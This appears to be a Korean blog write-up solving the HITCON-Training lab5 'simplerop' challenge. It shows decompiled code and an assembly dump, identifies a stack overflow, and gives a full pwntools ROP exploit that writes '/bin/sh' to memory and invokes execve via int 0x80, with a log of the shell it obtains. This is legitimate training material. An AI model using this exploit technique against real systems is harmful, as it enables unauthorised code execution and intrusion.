HITCON-Training lab5

Summary

32bit
syscall

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+1Ch] [ebp-14h]

  puts("ROP is easy is'nt it ?");
  printf("Your input :");
  fflush(stdout);
  return read(0, &v4, 100);
}

main assembler dump

Dump of assembler code for function main:
   0x08048e24 <+0>: push   ebp
   0x08048e25 <+1>: mov    ebp,esp
   0x08048e27 <+3>: and    esp,0xfffffff0
   0x08048e2a <+6>: sub    esp,0x30
   0x08048e2d <+9>: mov    DWORD PTR [esp],0x80be068
   0x08048e34 <+16>:    call   0x804f640 <puts>
   0x08048e39 <+21>:    mov    DWORD PTR [esp],0x80be07f
   0x08048e40 <+28>:    call   0x804f0e0 <printf>
   0x08048e45 <+33>:    mov    eax,ds:0x80ea4c0
   0x08048e4a <+38>:    mov    DWORD PTR [esp],eax
   0x08048e4d <+41>:    call   0x804f400 <fflush>
   0x08048e52 <+46>:    mov    DWORD PTR [esp+0x8],0x64
   0x08048e5a <+54>:    lea    eax,[esp+0x1c]
   0x08048e5e <+58>:    mov    DWORD PTR [esp+0x4],eax
   0x08048e62 <+62>:    mov    DWORD PTR [esp],0x0
   0x08048e69 <+69>:    call   0x806cd50 <read>
   0x08048e6e <+74>:    leave  
   0x08048e6f <+75>:    ret    
End of assembler dump.

v4에서 버퍼오버플로우가 터진다. v4에 입력을 받는데 ebp-14부터 입력을 받는것이 아니라 ebp-0x1c부터 입력을 받는다.

Exploit

from pwn import *

context(arch="i386", os="linux")

e = ELF("./simplerop")
p = process("./simplerop")

popedxecxebx = 0x0806e850
popedx = 0x0806e82a
popeax = 0x080bae06
movret = 0x0809a15d # mov dword ptr [edx], eax ; ret
int0x80 = 0x080493e1

p.recvuntil(":")

payload = ""
payload += "A"*(0x1c+0x4)

payload += p32(popedx)
payload += p32(e.symbols["__data_start"])
payload += p32(popeax)
payload += "/bin"
payload += p32(movret)

payload += p32(popedx)
payload += p32(e.symbols["__data_start"] + 4)
payload += p32(popeax)
payload += "/sh\x00"
payload += p32(movret)

payload += p32(popedxecxebx)
payload += p32(0)
payload += p32(0)
payload += p32(e.symbols["__data_start"])
payload += p32(popeax)
payload += p32(11)
payload += p32(int0x80)

p.sendline(payload)
p.interactive()

__data_start에 차근차근 "/bin/sh\x00"를 넣어주고 execve를 syscall하면 쉘이 뜬다.

https://cg10036.tistory.com/102 에 같은 방식으로 풀이한 내용이 있다.

cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab5$ p ex.py 
[*] '/home/cg10036/HITCON-Training/LAB/lab5/simplerop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './simplerop': pid 5290
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) groups=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

저작자표시 (새창열림)

'Wargame & CTF > HITCON-Training' 카테고리의 다른 글

[HITCON-Training] lab8 (0)	2019.11.18
[HITCON-Training] lab7 (0)	2019.11.18
[HITCON-Training] lab4 (0)	2019.11.04
[HITCON-Training] lab3 (0)	2019.10.30
[HITCON-Training] lab2 (0)	2019.10.30

이수혁

이수혁

태그

최근글

댓글

공지사항

아카이브

HITCON-Training lab5

Summary

Analysis

main

main assembler dump

Exploit

'Wargame & CTF > HITCON-Training' 카테고리의 다른 글

관련글

티스토리툴바